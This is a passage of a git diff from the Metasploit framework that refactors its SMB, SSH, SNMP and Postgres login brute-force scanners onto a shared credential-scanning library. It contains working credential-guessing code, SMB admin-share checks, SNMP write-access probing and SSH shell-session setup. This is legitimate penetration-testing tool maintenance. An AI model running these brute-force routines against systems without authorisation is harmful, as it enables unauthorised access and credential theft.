-      vprint_status("#{msg} Trying username:'#{user}' with password:'#{pass}' on database '#{database}'")
-      # Here's where the actual connection happens.
-      result = postgres_login(
-        :db => database,
-        :username => user,
-        :password => pass
-      )
-      case result
-      when :error_database
-        print_good("#{msg} Success: #{user}:#{pass} (Database '#{database}' failed.)")
-        do_report_auth_info(user,pass,database,false)
-        return :next_user # This is a success for user:pass!
-      when :error_credentials
-        vprint_error("#{msg} Username/Password failed.")
-        return :failed
-      when :connected
-        print_good("#{msg} Success: #{user}:#{pass} (Database '#{database}' succeeded.)")
-        do_report_auth_info(user,pass,database,true)
-        postgres_logout
-        return :next_user
-      when :error
-        vprint_error("#{msg} Unknown error encountered, giving up on host")
-        return :done
-      end
-    rescue Rex::ConnectionError
-      vprint_error "#{rhost}:#{rport} Connection Error: #{$!}"
-      return :done
-    end
-  end
 
-  # Report the service state
-  def do_report_postgres
-    report_service(
-      :host => rhost,
-      :port => rport,
-      :name => "postgres"
-    )
-  end
-
-  def do_report_auth_info(user,pass,db,db_ok)
-    do_report_postgres
-
-    result_hash = {
-      :host => rhost,
-      :port => rport,
-      :sname => "postgres",
-      :user => user,
-      :pass => pass,
-      :source_type => "user_supplied",
-      :active => true
-    }
-    result_hash[:user] = "#{db}/#{user}" if db_ok
-    report_auth_info result_hash
-  end
 
 end
diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb
index 6e5637e73e..ea30c0fec1 100644
--- a/modules/auxiliary/scanner/smb/smb_login.rb
+++ b/modules/auxiliary/scanner/smb/smb_login.rb
@@ -4,6 +4,8 @@
 ##
 
 require 'msf/core'
+require 'metasploit/framework/login_scanner/smb'
+require 'metasploit/framework/credential_collection'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -15,8 +17,6 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::AuthBrute
 
-  attr_reader :accepts_bogus_domains
-
   def proto
     'smb'
   end
@@ -50,30 +50,15 @@ class Metasploit3 < Msf::Auxiliary
     )
     deregister_options('RHOST','USERNAME','PASSWORD')
 
-    @accepts_guest_logins = {}
-
-    @correct_credentials_status_codes = [
-      "STATUS_INVALID_LOGON_HOURS",
-      "STATUS_INVALID_WORKSTATION",
-      "STATUS_ACCOUNT_RESTRICTION",
-      "STATUS_ACCOUNT_EXPIRED",
-      "STATUS_ACCOUNT_DISABLED",
-      "STATUS_ACCOUNT_RESTRICTION",
-      "STATUS_PASSWORD_EXPIRED",
-      "STATUS_PASSWORD_MUST_CHANGE",
-      "STATUS_LOGON_TYPE_NOT_GRANTED"
-    ]
-
     # These are normally advanced options, but for this module they have a
     # more active role, so make them regular options.
     register_options(
       [
         OptString.new('SMBPass', [ false, "SMB Password" ]),
         OptString.new('SMBUser', [ false, "SMB Username" ]),
-        OptString.new('SMBDomain', [ false, "SMB Domain", '']),
-        OptBool.new('CHECK_ADMIN', [ false, "Check for Admin rights", false]),
-        OptBool.new('PRESERVE_DOMAINS', [ false, "Respect a username that contains a domain name.", true]),
-        OptBool.new('RECORD_GUEST', [ false, "Record guest-privileged random logins to the database", false])
+        OptString.new('SMBDomain', [ false, "SMB Domain", '' ]),
+        OptBool.new('PRESERVE_DOMAINS', [ false, "Respect a username that contains a domain name.", true ]),
+        OptBool.new('RECORD_GUEST', [ false, "Record guest-privileged random logins to the database", false ])
       ], self.class)
 
   end
@@ -83,250 +68,134 @@ class Metasploit3 < Msf::Auxiliary
 
     domain = datastore['SMBDomain'] || ""
 
-    if accepts_bogus_logins?(domain)
-      print_error("#{smbhost} - This system accepts authentication with any credentials, brute force is ineffective.")
-      return
-    end
+    @scanner = Metasploit::Framework::LoginScanner::SMB.new(
+      host: ip,
+      port: rport,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      connection_timeout: 5,
+    )
 
-    unless datastore['RECORD_GUEST']
-      if accepts_guest_logins?(domain)
-        print_status("#{ip} - This system allows guest sessions with any credentials, these instances will not be recorded.")
+    bogus_result = @scanner.attempt_bogus_login(domain)
+    if bogus_result.success?
+      if bogus_result.access_level == Metasploit::Framework::LoginScanner::SMB::AccessLevels::GUEST
+        print_status("#{ip} - This system allows guest sessions with any credentials")
+      else
+        print_error("#{ip} - This system accepts authentication with any credentials, brute force is ineffective.")
+        return
       end
     end
 
-    begin
-      each_user_pass do |user, pass|
-        result = try_user_pass(domain, user, pass)
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+      blank_passwords: datastore['BLANK_PASSWORDS'],
+      pass_file: datastore['PASS_FILE'],
+      password: datastore['SMBPass'],
+      user_file: datastore['USER_FILE'],
+      userpass_file: datastore['USERPASS_FILE'],
+      username: datastore['SMBUser'],
+      user_as_pass: datastore['USER_AS_PASS'],
+      realm: domain,
+    )
+
+    @scanner.cred_details = cred_collection
+
+    @scanner.scan! do |result|
+      case result.status
+      when Metasploit::Model::Login::Status::DENIED_ACCESS
+        print_brute :level => :status, :ip => ip, :msg => "Correct credentials, but unable to login: '#{result.credential}', #{result.proof}"
+        report_creds(ip, rport, result)
+        :next_user
+      when Metasploit::Model::Login::Status::SUCCESSFUL
+        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}' #{result.access_level}"
+        report_creds(ip, rport, result)
+        :next_user
+      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        print_brute :level => :verror, :ip => ip, :msg => "Could not connect"
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+            realm_value: result.credential.realm,
+            status: result.status
+        )
+        :abort
+      when Metasploit::Model::Login::Status::INCORRECT
+        print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}', #{result.proof}"
+        invalidate_login(
+          address: ip,
+          port: rport,
+          protocol: 'tcp',
+          public: result.credential.public,
+          private: result.credential.private,
+          realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+          realm_value: result.credential.realm,
+          status: result.status
+        )
       end
-    rescue ::Rex::ConnectionError
-      nil
     end
 
   end
 
-  def check_login_status(domain, user, pass)
-    connect()
-    status_code = ""
-    begin
-      simple.login(
-        datastore['SMBName'],
-        user,
-        pass,
-        domain,
-        datastore['SMB::VerifySignature'],
-        datastore['NTLM::UseNTLMv2'],
-        datastore['NTLM::UseNTLM2_session'],
-        datastore['NTLM::SendLM'],
-        datastore['NTLM::UseLMKey'],
-        datastore['NTLM::SendNTLM'],
-        datastore['SMB::Native_OS'],
-        datastore['SMB::Native_LM'],
-        {:use_spn => datastore['NTLM::SendSPN'], :name =>  self.rhost}
-      )
-
-      # Windows SMB will return an error code during Session Setup, but nix Samba requires a Tree Connect:
-      simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
-      status_code = 'STATUS_SUCCESS'
-
-      if datastore['CHECK_ADMIN']
-        status_code = :not_admin
-        # Drop the existing connection to IPC$ in order to connect to admin$
-        simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$")
-        begin
-          simple.connect("\\\\#{datastore['RHOST']}\\admin$")
-          status_code = :admin_access
-          simple.disconnect("\\\\#{datastore['RHOST']}\\admin$")
-        rescue
-          status_code = :not_admin
-        ensure
-          begin
-            simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
-          rescue ::Rex::Proto::SMB::Exceptions::NoReply
-          end
-        end
-      end
-
-    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
-      status_code = e.get_error(e.error_code)
-    rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
-      status_code = e.error_reason
-    rescue ::Rex::Proto::SMB::Exceptions::InvalidWordCount => e
-      status_code = e.get_error(e.error_code)
-    rescue ::Rex::Proto::SMB::Exceptions::NoReply
-    ensure
-      disconnect()
-    end
-
-    return status_code
-  end
-
-  # If login is succesful and auth_user is unset
-  # the login was as a guest user.
-  def accepts_guest_logins?(domain)
-    guest = false
-    user = Rex::Text.rand_text_alpha(8)
-    pass = Rex::Text.rand_text_alpha(8)
-
-    guest_login = ((check_login_status(domain, user, pass) == 'STATUS_SUCCESS') && simple.client.auth_user.nil?)
-
-    if guest_login
-      @accepts_guest_logins['rhost'] ||=[] unless @accepts_guest_logins.include?(rhost)
-      report_note(
-        :host	=> rhost,
-        :proto => 'tcp',
-        :sname	=> 'smb',
-        :port   =>  datastore['RPORT'],
-        :type   => 'smb.account.info',
-        :data   => 'accepts guest login from any account',
-        :update => :unique_data
-      )
-    end
-
-    return guest_login
-  end
-
-  # If login is successul and auth_user is set
-  # then bogus creds are accepted.
-  def accepts_bogus_logins?(domain)
-    user = Rex::Text.rand_text_alpha(8)
-    pass = Rex::Text.rand_text_alpha(8)
-    bogus_login = ((check_login_status(domain, user, pass) == 'STATUS_SUCCESS') && !simple.client.auth_user.nil?)
-    return bogus_login
-  end
 
   # This logic is not universal ie a local account will not care about workgroup
   # but remote domain authentication will so check each instance
-  def accepts_bogus_domains?(user, pass, rhost)
-    domain  = Rex::Text.rand_text_alpha(8)
-    status = check_login_status(domain, user, pass)
-
-    bogus_domain = valid_credentials?(status)
-    if bogus_domain
-      vprint_status "Domain is ignored"
-    end
-
-    return valid_credentials?(status)
-  end
-
-  def valid_credentials?(status)
-
-    case status
-    when 'STATUS_SUCCESS', :admin_access, :not_admin
-      return true
-    when *@correct_credentials_status_codes
-      return true
-    else
-      return false
-    end
-
-  end
-
-  def try_user_pass(domain, user, pass)
-    # Note that unless PRESERVE_DOMAINS is true, we're more
-    # than happy to pass illegal usernames that contain
-    # slashes.
-    if datastore["PRESERVE_DOMAINS"]
-      d,u = domain_username_split(user)
-      user = u
-      domain = d if d
-    end
-
-    user = user.to_s.gsub(/<BLANK>/i,"")
-    status = check_login_status(domain, user, pass)
-
-    # Match original output message
-    if domain.empty? || domain == "."
-      domain_part = ""
-    else
-      domain_part = " \\\\#{domain}"
-    end
-    output_message = "#{rhost}:#{rport}#{domain_part} - ".gsub('%', '%%')
-    output_message << "%s"
-    output_message << " (#{smb_peer_os}) #{user} : #{pass} [#{status}]".gsub('%', '%%')
-
-    case status
-    when 'STATUS_SUCCESS', :admin_access, :not_admin
-      # Auth user indicates if the login was as a guest or not
-      if(simple.client.auth_user)
-        print_good(output_message % "SUCCESSFUL LOGIN")
-        validuser_case_sensitive?(domain, user, pass)
-        report_creds(domain,user,pass,true)
-      else
-        if datastore['RECORD_GUEST']
-          print_status(output_message % "GUEST LOGIN")
-          report_creds(domain,user,pass,true)
-        elsif datastore['VERBOSE']
-          print_status(output_message % "GUEST LOGIN")
-        end
-      end
-
-      return :next_user
-
-    when *@correct_credentials_status_codes
-      print_status(output_message % "FAILED LOGIN, VALID CREDENTIALS" )
-      report_creds(domain,user,pass,false)
-      validuser_case_sensitive?(domain, user, pass)
-      return :skip_user
-
-    when 'STATUS_LOGON_FAILURE', 'STATUS_ACCESS_DENIED'
-      vprint_error(output_message % "FAILED LOGIN")
-    else
-      vprint_error(output_message % "FAILED LOGIN")
-    end
-  end
-
-  def validuser_case_sensitive?(domain, user, pass)
-    if user == user.downcase
-      user = user.upcase
-    else
-      user = user.downcase
-    end
-
-    status = check_login_status(domain, user, pass)
-    case_insensitive = valid_credentials?(status)
-    if case_insensitive
-      vprint_status("Username is case insensitive")
-    end
-
-    return case_insensitive
-  end
-
-  def note_creds(domain,user,pass,reason)
-    report_note(
-      :host	=> rhost,
-      :proto => 'tcp',
-      :sname	=> 'smb',
-      :port   =>  datastore['RPORT'],
-      :type   => 'smb.account.info',
-      :data 	=> {:user => user, :pass => pass, :status => reason},
-      :update => :unique_data
+  def accepts_bogus_domains?(user, pass)
+    bogus_domain = @scanner.attempt_login(
+      Metasploit::Framework::Credential.new(
+        public: user,
+        private: pass,
+        realm: Rex::Text.rand_text_alpha(8)
+      )
     )
+
+    return bogus_domain.success?
   end
 
-  def report_creds(domain,user,pass,active)
-    login_name = ""
-
-    if accepts_bogus_domains?(user,pass,rhost) || domain.blank?
-      login_name = user
-    else
-      login_name = "#{domain}\\#{user}"
+  def report_creds(ip, port, result)
+    if !datastore['RECORD_GUEST']
+      if result.access_level == Metasploit::Framework::LoginScanner::SMB::AccessLevels::GUEST
+        return
+      end
     end
 
-    report_hash = {
-      :host	=> rhost,
-      :port   => datastore['RPORT'],
-      :sname	=> 'smb',
-      :user 	=> login_name,
-      :pass   => pass,
-      :source_type => "user_supplied",
-      :active => active
+    service_data = {
+      address: ip,
+      port: port,
+      service_name: 'smb',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
     }
 
-    if pass =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
-      report_hash.merge!({:type => 'smb_hash'})
-    else
-      report_hash.merge!({:type => 'password'})
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      private_data: result.credential.private,
+      private_type: :password,
+      username: result.credential.public,
+    }.merge(service_data)
+
+    if domain.present?
+      if accepts_bogus_domains?(result.credential.public, result.credential.private)
+        print_brute(:level => :vstatus, :ip => ip, :msg => "Domain is ignored for user #{result.credential.public}")
+      else
+        credential_data.merge!(
+          realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+          realm_value: result.credential.realm
+        )
+      end
     end
-    report_auth_info(report_hash)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      access_level: result.access_level,
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: result.status
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 end
diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb
index d16e1cfbe6..5f5e25ef66 100644
--- a/modules/auxiliary/scanner/snmp/snmp_login.rb
+++ b/modules/auxiliary/scanner/snmp/snmp_login.rb
@@ -5,8 +5,8 @@
 
 
 require 'msf/core'
-require 'openssl'
-require 'snmp'
+require 'metasploit/framework/community_string_collection'
+require 'metasploit/framework/login_scanner/snmp'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -49,260 +49,68 @@ class Metasploit3 < Msf::Auxiliary
   # Operate on an entire batch of hosts at once
   def run_batch(batch)
 
-    @found = {}
-    @tried = []
-
-    begin
-      udp_sock = nil
-      idx = 0
-
-      # Create an unbound UDP socket if no CHOST is specified, otherwise
-      # create a UDP socket bound to CHOST (in order to avail of pivoting)
-      udp_sock = Rex::Socket::Udp.create( { 'LocalHost' => datastore['CHOST'] || nil, 'Context' => {'Msf' => framework, 'MsfExploit' => self} })
-      add_socket(udp_sock)
-
-      each_user_pass do |user, pass|
-        comm = pass
-
-        data1 = create_probe_snmp1(comm)
-        data2 = create_probe_snmp2(comm)
-
-        batch.each do |ip|
-          fq_pass = [ip,pass]
-          next if @tried.include? fq_pass
-          @tried << fq_pass
-          vprint_status "#{ip}:#{datastore['RPORT']} - SNMP - Trying #{(pass.nil? || pass.empty?) ? "<BLANK>" : pass}..."
-
-          begin
-            udp_sock.sendto(data1, ip, datastore['RPORT'].to_i, 0)
-            udp_sock.sendto(data2, ip, datastore['RPORT'].to_i, 0)
-          rescue ::Interrupt
-            raise $!
-          rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
-            nil
-          end
-
-          if (idx % 10 == 0)
-            while (r = udp_sock.recvfrom(65535, 0.25) and r[1])
-              parse_reply(r)
-            end
-          end
-
-          idx += 1
-
-        end
-      end
-
-      idx = 0
-      while (r = udp_sock.recvfrom(65535, 3) and r[1] and idx < 500)
-        parse_reply(r)
-        idx += 1
-      end
-
-      if @found.keys.length > 0
-        print_status("Validating scan results from #{@found.keys.length} hosts...")
-      end
-
-      # Review all successful communities and determine write access
-      @found.keys.sort.each do |host|
-        fake_comm  = Rex::Text.rand_text_alphanumeric(8)
-        anycomm_ro = false
-        anycomm_rw = false
-        comms_ro   = []
-        comms_rw   = []
-        finished   = false
-        versions = ["1", "2"]
-
-        versions.each do |version|
-        comms_todo = @found[host].keys.sort
-        comms_todo.unshift(fake_comm)
-
-        comms_todo.each do |comm|
-          begin
-            sval = nil
-            snmp = snmp_client(host, datastore['RPORT'].to_i, version, udp_sock, comm)
-            resp = snmp.get("sysName.0")
-            resp.each_varbind { |var| sval = var.value }
-            next if not sval
-
-            svar = ::SNMP::VarBind.new("1.3.6.1.2.1.1.5.0", ::SNMP::OctetString.new(sval))
-            resp = snmp.set(svar)
-
-            if resp.error_status == :noError
-              comms_rw << comm
-              print_status("Host #{host} provides READ-WRITE access with community '#{comm}'")
-              if comm == fake_comm
-                anycomm_rw = true
-                finished   = true
-                break
-              end
-            else
-              comms_ro << comm
-              print_status("Host #{host} provides READ-ONLY access with community '#{comm}'")
-              if comm == fake_comm
-                anycomm_ro = true
-                finished   = true
-                break
-              end
-            end
-
-            # Used to flag whether this version was compatible
-            finished = true
-
-          rescue ::SNMP::UnsupportedPduTag, ::SNMP::InvalidPduTag, ::SNMP::ParseError,
-            ::SNMP::InvalidErrorStatus, ::SNMP::InvalidTrapVarbind, ::SNMP::InvalidGenericTrap,
-            ::SNMP::BER::OutOfData, ::SNMP::BER::InvalidLength, ::SNMP::BER::InvalidTag,
-            ::SNMP::BER::InvalidObjectId, ::SNMP::MIB::ModuleNotLoadedError,
-            ::SNMP::UnsupportedValueTag
-            next
-
-          rescue ::SNMP::UnsupportedVersion
-            break
-          rescue ::SNMP::RequestTimeout
-            next
-          end
-        end
-
-        break if finished
-        end
-
-        # Report on the results
-        comms_ro = ["anything"] if anycomm_ro
-        comms_rw = ["anything"] if anycomm_rw
-
-        comms_rw.each do |comm|
-          report_auth_info(
-            :host   => host,
-            :port   => datastore['RPORT'].to_i,
-            :proto  => 'udp',
-            :sname  => 'snmp',
-            :user   => '',
-            :pass   => comm,
-            :duplicate_ok => true,
-            :active => true,
-            :source_type => "user_supplied",
-            :type   => "password"
-          )
-        end
-
-        comms_ro.each do |comm|
-          report_auth_info(
-            :host   => host,
-            :port   => datastore['RPORT'].to_i,
-            :proto  => 'udp',
-            :sname  => 'snmp',
-            :user   => '',
-            :pass   => comm,
-            :duplicate_ok => true,
-            :active => true,
-            :source_type => "user_supplied",
-            :type   => "password_ro"
-          )
-        end
-      end
-
-    rescue ::Interrupt
-      raise $!
-    rescue ::Exception => e
-      print_error("Unknown error: #{e.class} #{e}")
-    end
-
-  end
-
-  #
-  # Allocate a SNMP client using the existing socket
-  #
-  def snmp_client(host, port, version, socket, community)
-    version = :SNMPv1  if version == "1"
-    version = :SNMPv2c if version == "2c"
-
-    snmp = ::SNMP::Manager.new(
-      :Host      => host,
-      :Port      => port,
-      :Community => community,
-      :Version => version,
-      :Timeout => 1,
-      :Retries => 2,
-      :Transport => SNMP::RexUDPTransport,
-      :Socket => socket
-    )
-  end
-
-  #
-  # The response parsers
-  #
-  def parse_reply(pkt)
-
-    return if not pkt[1]
-
-    if(pkt[1] =~ /^::ffff:/)
-      pkt[1] = pkt[1].sub(/^::ffff:/, '')
-    end
-
-    asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
-    return if not asn
-
-    snmp_error = asn.value[0].value rescue nil
-    snmp_comm  = asn.value[1].value rescue nil
-    snmp_data  = asn.value[2].value[3].value[0] rescue nil
-    snmp_oid   = snmp_data.value[0].value rescue nil
-    snmp_info  = snmp_data.value[1].value rescue nil
-
-    return if not (snmp_error and snmp_comm and snmp_data and snmp_oid and snmp_info)
-    snmp_info = snmp_info.to_s.gsub(/\s+/, ' ')
-
-    inf = snmp_info
-    com = snmp_comm
-
-    if(com)
-      @found[pkt[1]]||={}
-      if(not @found[pkt[1]][com])
-        print_good("SNMP: #{pkt[1]} community string: '#{com}' info: '#{inf}'")
-        @found[pkt[1]][com] = inf
-      end
-
-      report_service(
-        :host   => pkt[1],
-        :port   => pkt[2],
-        :proto  => 'udp',
-        :name  => 'snmp',
-        :info   => inf,
-        :state => "open"
+    batch.each do |ip|
+      collection = Metasploit::Framework::CommunityStringCollection.new(
+          pass_file: datastore['PASS_FILE'],
+          password: datastore['PASSWORD']
       )
+
+      scanner = Metasploit::Framework::LoginScanner::SNMP.new(
+          host: ip,
+          port: rport,
+          cred_details: collection,
+          stop_on_success: datastore['STOP_ON_SUCCESS'],
+          connection_timeout: 2
+      )
+
+      service_data = {
+          address: ip,
+          port: rport,
+          service_name: 'snmp',
+          protocol: 'udp',
+          workspace_id: myworkspace_id
+      }
+
+      scanner.scan! do |result|
+        if result.success?
+          credential_data = {
+              module_fullname: self.fullname,
+              origin_type: :service,
+              username: result.credential.public
+          }
+          credential_data.merge!(service_data)
+
+          credential_core = create_credential(credential_data)
+
+          login_data = {
+              core: credential_core,
+              last_attempted_at: DateTime.now,
+              status: Metasploit::Model::Login::Status::SUCCESSFUL
+          }
+          login_data.merge!(service_data)
+
+          create_credential_login(login_data)
+          print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
+        else
+          invalidate_data = {
+              public: result.credential.public,
+              private: result.credential.private,
+              realm_key: result.credential.realm_key,
+              realm_value: result.credential.realm,
+              status: result.status
+          } .merge(service_data)
+          invalidate_login(invalidate_data)
+          print_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
+        end
+      end
     end
   end
 
-
-  def create_probe_snmp1(name)
-    xid = rand(0x100000000)
-    pdu =
-      "\x02\x01\x00" +
-      "\x04" + [name.length].pack('c') + name +
-      "\xa0\x1c" +
-      "\x02\x04" + [xid].pack('N') +
-      "\x02\x01\x00" +
-      "\x02\x01\x00" +
-      "\x30\x0e\x30\x0c\x06\x08\x2b\x06\x01\x02\x01" +
-      "\x01\x01\x00\x05\x00"
-    head = "\x30" + [pdu.length].pack('C')
-    data = head + pdu
-    data
+  def rport
+    datastore['RPORT']
   end
 
-  def create_probe_snmp2(name)
-    xid = rand(0x100000000)
-    pdu =
-      "\x02\x01\x01" +
-      "\x04" + [name.length].pack('c') + name +
-      "\xa1\x19" +
-      "\x02\x04" + [xid].pack('N') +
-      "\x02\x01\x00" +
-      "\x02\x01\x00" +
-      "\x30\x0b\x30\x09\x06\x05\x2b\x06\x01\x02\x01" +
-      "\x05\x00"
-    head = "\x30" + [pdu.length].pack('C')
-    data = head + pdu
-    data
-  end
+
+
 
 end
diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb
index b08a3e55cb..9c7f83bd83 100644
--- a/modules/auxiliary/scanner/ssh/ssh_login.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login.rb
@@ -5,6 +5,8 @@
 
 require 'msf/core'
 require 'net/ssh'
+require 'metasploit/framework/login_scanner/ssh'
+require 'metasploit/framework/credential_collection'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -13,8 +15,6 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::CommandShell
 
-  attr_accessor :ssh_socket, :good_credentials
-
   def initialize
     super(
       'Name'        => 'SSH Login Check Scanner',
@@ -47,145 +47,147 @@ class Metasploit3 < Msf::Auxiliary
 
     deregister_options('RHOST')
 
-    @good_credentials = {}
-
   end
 
   def rport
     datastore['RPORT']
   end
 
-  def do_login(ip,user,pass,port)
-    opt_hash = {
-      :auth_methods  => ['password','keyboard-interactive'],
-      :msframework   => framework,
-      :msfmodule     => self,
-      :port          => port,
-      :disable_agent => true,
-      :password      => pass,
-      :config        => false,
-      :proxies       => datastore['Proxies']
+  def session_setup(result, ssh_socket)
+    return unless ssh_socket
+
+    # Create a new session
+    conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
+
+    merge_me = {
+      'USERPASS_FILE' => nil,
+      'USER_FILE'     => nil,
+      'PASS_FILE'     => nil,
+      'USERNAME'      => result.credential.public,
+      'PASSWORD'      => result.credential.private
     }
+    info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})"
+    s = start_session(self, info, merge_me, false, conn.lsock)
 
-    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
-
-    begin
-      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
-        self.ssh_socket = Net::SSH.start(
-          ip,
-          user,
-          opt_hash
-        )
-      end
-    rescue Rex::ConnectionError, Rex::AddressInUse
-      return :connection_error
-    rescue Net::SSH::Disconnect, ::EOFError
-      return :connection_disconnect
-    rescue ::Timeout::Error
-      return :connection_disconnect
-    rescue Net::SSH::Exception
-      return [:fail,nil] # For whatever reason. Can't tell if passwords are on/off without timing responses.
+    # Set the session platform
+    case result.proof
+    when /Linux/
+      s.platform = "linux"
+    when /Darwin/
+      s.platform = "osx"
+    when /SunOS/
+      s.platform = "solaris"
+    when /BSD/
+      s.platform = "bsd"
+    when /HP-UX/
+      s.platform = "hpux"
+    when /AIX/
+      s.platform = "aix"
+    when /Win32|Windows/
+      s.platform = "windows"
+    when /Unknown command or computer name/
+      s.platform = "cisco-ios"
     end
 
-    if self.ssh_socket
-      proof = ''
-      begin
-        Timeout.timeout(5) do
-          proof = self.ssh_socket.exec!("id\n").to_s
-          if(proof =~ /id=/)
-            proof << self.ssh_socket.exec!("uname -a\n").to_s
-          else
-            # Cisco IOS
-            if proof =~ /Unknown command or computer name/
-              proof = self.ssh_socket.exec!("ver\n").to_s
-            else
-              proof << self.ssh_socket.exec!("help\n?\n\n\n").to_s
-            end
-          end
-        end
-      rescue ::Exception
-      end
-
-      # Create a new session
-      conn = Net::SSH::CommandStream.new(self.ssh_socket, '/bin/sh', true)
-
-      merge_me = {
-        'USERPASS_FILE' => nil,
-        'USER_FILE'     => nil,
-        'PASS_FILE'     => nil,
-        'USERNAME'      => user,
-        'PASSWORD'      => pass
-      }
-      info = "#{proto_from_fullname} #{user}:#{pass} (#{ip}:#{port})"
-      s = start_session(self, info, merge_me, false, conn.lsock)
-
-      # Set the session platform
-      case proof
-      when /Linux/
-        s.platform = "linux"
-      when /Darwin/
-        s.platform = "osx"
-      when /SunOS/
-        s.platform = "solaris"
-      when /BSD/
-        s.platform = "bsd"
-      when /HP-UX/
-        s.platform = "hpux"
-      when /AIX/
-        s.platform = "aix"
-      when /Win32|Windows/
-        s.platform = "windows"
-      when /Unknown command or computer name/
-        s.platform = "cisco-ios"
-      end
-      return [:success, proof]
-    else
-      return [:fail, nil]
-    end
+    s
   end
 
-  def do_report(ip,user,pass,port,proof)
-    report_auth_info(
-      :host => ip,
-      :port => rport,
-      :sname => 'ssh',
-      :user => user,
-      :pass => pass,
-      :proof => proof,
-      :source_type => "user_supplied",
-      :active => true
-    )
+  def do_report(ip,port,result)
+    service_data = {
+      address: ip,
+      port: port,
+      service_name: 'ssh',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      private_data: result.credential.private,
+      private_type: :password,
+      username: result.credential.public,
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: result.status
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
   def run_host(ip)
+    @ip = ip
     print_brute :ip => ip, :msg => "Starting bruteforce"
-    each_user_pass do |user, pass|
-      print_brute :level => :vstatus,
-        :ip => ip,
-        :msg => "Trying: username: '#{user}' with password: '#{pass}'"
-      this_attempt ||= 0
-      ret = nil
-      while this_attempt <=3 and (ret.nil? or ret == :connection_error or ret == :connection_disconnect)
-        if this_attempt > 0
-          select(nil,nil,nil,2**this_attempt)
-          print_brute :level => :verror, :ip => ip, :msg => "Retrying '#{user}':'#{pass}' due to connection error"
-        end
-        ret,proof = do_login(ip,user,pass,rport)
-        this_attempt += 1
-      end
-      case ret
-      when :success
-        print_brute :level => :good, :ip => ip, :msg => "Success: '#{user}':'#{pass}' '#{proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
-        do_report(ip,user,pass,rport,proof)
+
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+      blank_passwords: datastore['BLANK_PASSWORDS'],
+      pass_file: datastore['PASS_FILE'],
+      password: datastore['PASSWORD'],
+      user_file: datastore['USER_FILE'],
+      userpass_file: datastore['USERPASS_FILE'],
+      username: datastore['USERNAME'],
+      user_as_pass: datastore['USER_AS_PASS'],
+    )
+
+    scanner = Metasploit::Framework::LoginScanner::SSH.new(
+      host: ip,
+      port: rport,
+      cred_details: cred_collection,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      connection_timeout: datastore['SSH_TIMEOUT'],
+    )
+
+    scanner.scan! do |result|
+      case result.status
+      when Metasploit::Model::Login::Status::SUCCESSFUL
+        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
+        do_report(ip,rport,result)
+        session_setup(result, scanner.ssh_socket)
         :next_user
-      when :connection_error
+      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
         print_brute :level => :verror, :ip => ip, :msg => "Could not connect"
+        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: result.credential.realm_key,
+            realm_value: result.credential.realm,
+            status: result.status
+        )
         :abort
-      when :connection_disconnect
-        print_brute :level => :verror, :ip => ip, :msg => "Connection timed out"
-        :abort
-      when :fail
-        print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{user}':'#{pass}'"
+      when Metasploit::Model::Login::Status::INCORRECT
+        print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
+        invalidate_login(
+            address: ip,
+            port: rport,
